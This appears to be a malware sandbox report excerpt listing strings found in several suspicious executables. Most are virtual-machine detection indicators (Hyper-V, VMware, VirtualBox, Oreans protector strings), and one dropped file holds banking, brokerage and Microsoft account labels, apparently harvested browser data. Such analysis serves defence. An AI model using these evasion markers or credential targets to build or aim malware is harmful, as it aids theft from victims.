Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: HCGCBFHCFC.exe, 00000008.00000003.2303003406.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000135C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000C6C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: BAEBFIIE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000135C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000C6C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: BAEBFIIE.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2271711490.000000000135C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000C6C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: BAEBFIIE.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: BAEBFIIE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: HCGCBFHCFC.exe, 00000008.00000002.2322856560.00000000009AA000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000A.00000002.4551933832.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000B.00000002.2370774596.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2659743928.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000010.00000002.3262920684.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000011.00000002.3864077697.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000012.00000002.4462386574.0000000000F8A000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: BAEBFIIE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: BAEBFIIE.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: BAEBFIIE.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: BAEBFIIE.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C34000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BAEBFIIE.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: BAEBFIIE.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: BAEBFIIE.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: BAEBFIIE.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: BAEBFIIE.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: BAEBFIIE.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: BAEBFIIE.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: BAEBFIIE.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: BAEBFIIE.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: BAEBFIIE.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: explorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0S;
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWO
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: BAEBFIIE.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: BAEBFIIE.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: BAEBFIIE.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: BAEBFIIE.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: BAEBFIIE.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
